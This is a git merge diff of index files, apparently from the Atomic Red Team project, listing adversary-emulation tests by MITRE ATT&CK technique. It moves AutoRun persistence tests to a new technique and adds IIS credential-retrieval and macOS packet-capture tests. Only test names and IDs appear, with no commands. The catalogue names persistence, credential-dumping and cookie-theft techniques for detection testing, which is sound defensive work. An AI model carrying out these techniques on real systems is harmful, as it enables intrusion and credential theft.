Merge branch 'master' into am_t1547007_reopen_coded

2022-11-09 11:33:52 -05:00
parent 3c28d6cb5d 5cdfa5a9a6
commit 3fec85b734
28 changed files with 1149 additions and 270 deletions
@@ -566,8 +566,6 @@ privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run K
 privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,13,HKLM - Policy Settings Explorer Run Key,b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f,powershell
 privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,14,HKLM - Append Command to Winlogon Userinit KEY Value,f7fab6cc-8ece-4ca7-a0f1-30a22fccd374,powershell
 privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,15,HKLM - Modify default System Shell - Winlogon Shell KEY Value ,1d958c61-09c6-4d9e-b26b-4130314e520e,powershell
-privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,16,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
-privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,17,HKCU - Persistence using CommandProcessor AutoRun key (With Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
 privilege-escalation,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
 privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
 privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
@@ -575,6 +573,8 @@ privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a sys
 privilege-escalation,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 privilege-escalation,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 privilege-escalation,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
+privilege-escalation,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
+privilege-escalation,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (With Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
 privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
 privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
 privilege-escalation,T1134.005,Access Token Manipulation: SID-History Injection,1,Injection SID-History with mimikatz,6bef32e5-9456-4072-8f14-35566fb85401,command_prompt
@@ -809,8 +809,6 @@ persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Sta
 persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,13,HKLM - Policy Settings Explorer Run Key,b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f,powershell
 persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,14,HKLM - Append Command to Winlogon Userinit KEY Value,f7fab6cc-8ece-4ca7-a0f1-30a22fccd374,powershell
 persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,15,HKLM - Modify default System Shell - Winlogon Shell KEY Value ,1d958c61-09c6-4d9e-b26b-4130314e520e,powershell
-persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,16,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
-persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,17,HKCU - Persistence using CommandProcessor AutoRun key (With Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
 persistence,T1136.003,Create Account: Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh
 persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
 persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
@@ -826,6 +824,8 @@ persistence,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Servic
 persistence,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
 persistence,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
 persistence,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
+persistence,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
+persistence,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (With Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
 persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
 persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
 persistence,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
@@ -958,6 +958,8 @@ credential-access,T1110.001,Brute Force: Password Guessing,6,Password Brute User
 credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
 credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
 credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
+credential-access,T1003,OS Credential Dumping,4,Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list),6c7a4fd3-5b0b-4b30-a93e-39411b25d889,powershell
+credential-access,T1003,OS Credential Dumping,5,Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config),42510244-5019-48fa-a0e5-66c3b76e6049,powershell
 credential-access,T1539,Steal Web Session Cookie,1,Steal Firefox Cookies (Windows),4b437357-f4e9-4c84-9fa6-9bcee6f826aa,powershell
 credential-access,T1539,Steal Web Session Cookie,2,Steal Chrome Cookies (Windows),26a6b840-4943-4965-8df5-ef1f9a282440,powershell
 credential-access,T1003.002,OS Credential Dumping: Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
@@ -977,11 +979,13 @@ credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,1,Dump indivi
 credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
 credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,3,Capture Passwords with MimiPenguin,a27418de-bdce-4ebd-b655-38f04842bf0c,bash
 credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
-credential-access,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash
+credential-access,T1040,Network Sniffing,2,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
 credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
 credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
 credential-access,T1040,Network Sniffing,5,Windows Internal pktmon capture,c67ba807-f48b-446e-b955-e4928cd1bf91,command_prompt
 credential-access,T1040,Network Sniffing,6,Windows Internal pktmon set filter,855fb8b4-b8ab-4785-ae77-09f5df7bff55,command_prompt
+credential-access,T1040,Network Sniffing,7,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash
+credential-access,T1040,Network Sniffing,8,Filtered Packet Capture macOS using /dev/bpfN with sudo,e2480aee-23f3-4f34-80ce-de221e27cd19,bash
 credential-access,T1552.002,Unsecured Credentials: Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
 credential-access,T1552.002,Unsecured Credentials: Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt
 credential-access,T1556.002,Modify Authentication Process: Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
@@ -1151,11 +1155,13 @@ discovery,T1007,System Service Discovery,1,System Service Discovery,89676ba1-b1f
 discovery,T1007,System Service Discovery,2,System Service Discovery - net.exe,5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3,command_prompt
 discovery,T1007,System Service Discovery,3,System Service Discovery - systemctl,f4b26bce-4c2c-46c0-bcc5-fce062d38bef,bash
 discovery,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
-discovery,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash
+discovery,T1040,Network Sniffing,2,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
 discovery,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
 discovery,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
 discovery,T1040,Network Sniffing,5,Windows Internal pktmon capture,c67ba807-f48b-446e-b955-e4928cd1bf91,command_prompt
 discovery,T1040,Network Sniffing,6,Windows Internal pktmon set filter,855fb8b4-b8ab-4785-ae77-09f5df7bff55,command_prompt
+discovery,T1040,Network Sniffing,7,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash
+discovery,T1040,Network Sniffing,8,Filtered Packet Capture macOS using /dev/bpfN with sudo,e2480aee-23f3-4f34-80ce-de221e27cd19,bash
 discovery,T1135,Network Share Discovery,1,Network Share Discovery,f94b5ad9-911c-4eff-9718-fd21899db4f7,sh
 discovery,T1135,Network Share Discovery,2,Network Share Discovery - linux,875805bc-9e86-4e87-be86-3a5527315cae,bash
 discovery,T1135,Network Share Discovery,3,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt
@@ -122,7 +122,9 @@ privilege-escalation,T1547.007,Boot or Logon Autostart Execution: Re-opened Appl
 privilege-escalation,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
 credential-access,T1056.001,Input Capture: Keylogging,7,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash
 credential-access,T1555.001,Credentials from Password Stores: Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh
-credential-access,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash
+credential-access,T1040,Network Sniffing,2,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
+credential-access,T1040,Network Sniffing,7,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash
+credential-access,T1040,Network Sniffing,8,Filtered Packet Capture macOS using /dev/bpfN with sudo,e2480aee-23f3-4f34-80ce-de221e27cd19,bash
 credential-access,T1552,Unsecured Credentials,1,AWS - Retrieve EC2 Password Data using stratus,a21118de-b11e-4ebd-b655-42f11142df0c,sh
 credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
 credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,14,Simulating Access to Chrome Login Data - MacOS,124e13e5-d8a1-4378-a6ee-a53cd0c7e369,sh
@@ -142,7 +144,9 @@ discovery,T1087.001,Account Discovery: Local Account,4,List opened files by user
 discovery,T1087.001,Account Discovery: Local Account,6,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
 discovery,T1087.001,Account Discovery: Local Account,7,Enumerate users and groups,319e9f6c-7a9e-432e-8c62-9385c803b6f2,sh
 discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
-discovery,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash
+discovery,T1040,Network Sniffing,2,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
+discovery,T1040,Network Sniffing,7,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash
+discovery,T1040,Network Sniffing,8,Filtered Packet Capture macOS using /dev/bpfN with sudo,e2480aee-23f3-4f34-80ce-de221e27cd19,bash
 discovery,T1135,Network Share Discovery,1,Network Share Discovery,f94b5ad9-911c-4eff-9718-fd21899db4f7,sh
 discovery,T1082,System Information Discovery,2,System Information Discovery,edff98ec-0f73-4f63-9890-6b117092aff6,sh
 discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh
@@ -427,11 +427,11 @@ privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run K
 privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,13,HKLM - Policy Settings Explorer Run Key,b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f,powershell
 privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,14,HKLM - Append Command to Winlogon Userinit KEY Value,f7fab6cc-8ece-4ca7-a0f1-30a22fccd374,powershell
 privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,15,HKLM - Modify default System Shell - Winlogon Shell KEY Value ,1d958c61-09c6-4d9e-b26b-4130314e520e,powershell
-privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,16,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
-privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,17,HKCU - Persistence using CommandProcessor AutoRun key (With Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
 privilege-escalation,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 privilege-escalation,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 privilege-escalation,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
+privilege-escalation,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
+privilege-escalation,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (With Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
 privilege-escalation,T1134.005,Access Token Manipulation: SID-History Injection,1,Injection SID-History with mimikatz,6bef32e5-9456-4072-8f14-35566fb85401,command_prompt
 privilege-escalation,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
 privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
@@ -607,12 +607,12 @@ persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Sta
 persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,13,HKLM - Policy Settings Explorer Run Key,b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f,powershell
 persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,14,HKLM - Append Command to Winlogon Userinit KEY Value,f7fab6cc-8ece-4ca7-a0f1-30a22fccd374,powershell
 persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,15,HKLM - Modify default System Shell - Winlogon Shell KEY Value ,1d958c61-09c6-4d9e-b26b-4130314e520e,powershell
-persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,16,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
-persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,17,HKCU - Persistence using CommandProcessor AutoRun key (With Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
 persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
 persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
 persistence,T1098,Account Manipulation,9,Password Change on Directory Service Restore Mode (DSRM) Account,d5b886d9-d1c7-4b6e-a7b0-460041bf2823,command_prompt
 persistence,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
+persistence,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
+persistence,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (With Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
 persistence,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
 persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
 persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
@@ -693,6 +693,8 @@ credential-access,T1110.001,Brute Force: Password Guessing,6,Password Brute User
 credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
 credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
 credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
+credential-access,T1003,OS Credential Dumping,4,Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list),6c7a4fd3-5b0b-4b30-a93e-39411b25d889,powershell
+credential-access,T1003,OS Credential Dumping,5,Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config),42510244-5019-48fa-a0e5-66c3b76e6049,powershell
 credential-access,T1539,Steal Web Session Cookie,1,Steal Firefox Cookies (Windows),4b437357-f4e9-4c84-9fa6-9bcee6f826aa,powershell
 credential-access,T1539,Steal Web Session Cookie,2,Steal Chrome Cookies (Windows),26a6b840-4943-4965-8df5-ef1f9a282440,powershell
 credential-access,T1003.002,OS Credential Dumping: Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
@@ -863,8 +863,6 @@
  - Atomic Test #13: HKLM - Policy Settings Explorer Run Key [windows]
  - Atomic Test #14: HKLM - Append Command to Winlogon Userinit KEY Value [windows]
  - Atomic Test #15: HKLM - Modify default System Shell - Winlogon Shell KEY Value  [windows]
-  - Atomic Test #16: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
-  - Atomic Test #17: HKCU - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
 - [T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
  - Atomic Test #1: Linux - Load Kernel Module via insmod [linux]
 - T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -881,6 +879,8 @@
 - T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546 Event Triggered Execution](../../T1546/T1546.md)
  - Atomic Test #1: Persistence with Custom AutodialDLL [windows]
+  - Atomic Test #2: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
+  - Atomic Test #3: HKCU - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
 - [T1546.004 Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
  - Atomic Test #1: Add command to .bash_profile [macos, linux]
  - Atomic Test #2: Add command to .bashrc [macos, linux]
@@ -1318,8 +1318,6 @@
  - Atomic Test #13: HKLM - Policy Settings Explorer Run Key [windows]
  - Atomic Test #14: HKLM - Append Command to Winlogon Userinit KEY Value [windows]
  - Atomic Test #15: HKLM - Modify default System Shell - Winlogon Shell KEY Value  [windows]
-  - Atomic Test #16: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
-  - Atomic Test #17: HKCU - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
 - [T1136.003 Create Account: Cloud Account](../../T1136.003/T1136.003.md)
  - Atomic Test #1: AWS - Create a new IAM user [iaas:aws]
 - [T1098 Account Manipulation](../../T1098/T1098.md)
@@ -1348,6 +1346,8 @@
 - T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546 Event Triggered Execution](../../T1546/T1546.md)
  - Atomic Test #1: Persistence with Custom AutodialDLL [windows]
+  - Atomic Test #2: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
+  - Atomic Test #3: HKCU - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
 - [T1546.004 Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
  - Atomic Test #1: Add command to .bash_profile [macos, linux]
  - Atomic Test #2: Add command to .bashrc [macos, linux]
@@ -1605,6 +1605,8 @@
  - Atomic Test #1: Gsecdump [windows]
  - Atomic Test #2: Credential Dumping with NPPSpy [windows]
  - Atomic Test #3: Dump svchost.exe to gather RDP credentials [windows]
+  - Atomic Test #4: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list) [windows]
+  - Atomic Test #5: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config) [windows]
 - T1171 LLMNR/NBT-NS Poisoning and Relay [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1539 Steal Web Session Cookie](../../T1539/T1539.md)
  - Atomic Test #1: Steal Firefox Cookies (Windows) [windows]
@@ -1639,11 +1641,13 @@
 - T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1040 Network Sniffing](../../T1040/T1040.md)
  - Atomic Test #1: Packet Capture Linux [linux]
-  - Atomic Test #2: Packet Capture macOS [macos]
+  - Atomic Test #2: Packet Capture macOS using tcpdump or tshark [macos]
  - Atomic Test #3: Packet Capture Windows Command Prompt [windows]
  - Atomic Test #4: Windows Internal Packet Capture [windows]
  - Atomic Test #5: Windows Internal pktmon capture [windows]
  - Atomic Test #6: Windows Internal pktmon set filter [windows]
+  - Atomic Test #7: Packet Capture macOS using /dev/bpfN with sudo [macos]
+  - Atomic Test #8: Filtered Packet Capture macOS using /dev/bpfN with sudo [macos]
 - [T1552.002 Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md)
  - Atomic Test #1: Enumeration for Credentials in Registry [windows]
  - Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows]
@@ -1879,11 +1883,13 @@
  - Atomic Test #3: System Service Discovery - systemctl [linux]
 - [T1040 Network Sniffing](../../T1040/T1040.md)
  - Atomic Test #1: Packet Capture Linux [linux]
-  - Atomic Test #2: Packet Capture macOS [macos]
+  - Atomic Test #2: Packet Capture macOS using tcpdump or tshark [macos]
  - Atomic Test #3: Packet Capture Windows Command Prompt [windows]
  - Atomic Test #4: Windows Internal Packet Capture [windows]
  - Atomic Test #5: Windows Internal pktmon capture [windows]
  - Atomic Test #6: Windows Internal pktmon set filter [windows]
+  - Atomic Test #7: Packet Capture macOS using /dev/bpfN with sudo [macos]
+  - Atomic Test #8: Filtered Packet Capture macOS using /dev/bpfN with sudo [macos]
 - [T1135 Network Share Discovery](../../T1135/T1135.md)
  - Atomic Test #1: Network Share Discovery [macos]
  - Atomic Test #2: Network Share Discovery - linux [linux]
@@ -384,7 +384,9 @@
 - T1167 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1040 Network Sniffing](../../T1040/T1040.md)
-  - Atomic Test #2: Packet Capture macOS [macos]
+  - Atomic Test #2: Packet Capture macOS using tcpdump or tshark [macos]
+  - Atomic Test #7: Packet Capture macOS using /dev/bpfN with sudo [macos]
+  - Atomic Test #8: Filtered Packet Capture macOS using /dev/bpfN with sudo [macos]
 - T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1552 Unsecured Credentials](../../T1552/T1552.md)
@@ -443,7 +445,9 @@
 - T1069.002 Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1007 System Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1040 Network Sniffing](../../T1040/T1040.md)
-  - Atomic Test #2: Packet Capture macOS [macos]
+  - Atomic Test #2: Packet Capture macOS using tcpdump or tshark [macos]
+  - Atomic Test #7: Packet Capture macOS using /dev/bpfN with sudo [macos]
+  - Atomic Test #8: Filtered Packet Capture macOS using /dev/bpfN with sudo [macos]
 - [T1135 Network Share Discovery](../../T1135/T1135.md)
  - Atomic Test #1: Network Share Discovery [macos]
 - T1120 Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -654,8 +654,6 @@
  - Atomic Test #13: HKLM - Policy Settings Explorer Run Key [windows]
  - Atomic Test #14: HKLM - Append Command to Winlogon Userinit KEY Value [windows]
  - Atomic Test #15: HKLM - Modify default System Shell - Winlogon Shell KEY Value  [windows]
-  - Atomic Test #16: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
-  - Atomic Test #17: HKCU - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
 - T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -665,6 +663,8 @@
 - T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546 Event Triggered Execution](../../T1546/T1546.md)
  - Atomic Test #1: Persistence with Custom AutodialDLL [windows]
+  - Atomic Test #2: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
+  - Atomic Test #3: HKCU - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
 - [T1134.005 Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md)
  - Atomic Test #1: Injection SID-History with mimikatz [windows]
 - [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
@@ -981,8 +981,6 @@
  - Atomic Test #13: HKLM - Policy Settings Explorer Run Key [windows]
  - Atomic Test #14: HKLM - Append Command to Winlogon Userinit KEY Value [windows]
  - Atomic Test #15: HKLM - Modify default System Shell - Winlogon Shell KEY Value  [windows]
-  - Atomic Test #16: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
-  - Atomic Test #17: HKCU - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
 - [T1098 Account Manipulation](../../T1098/T1098.md)
  - Atomic Test #1: Admin Account Manipulate [windows]
  - Atomic Test #2: Domain Account and Group Manipulate [windows]
@@ -994,6 +992,8 @@
 - T1505.004 IIS Components [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546 Event Triggered Execution](../../T1546/T1546.md)
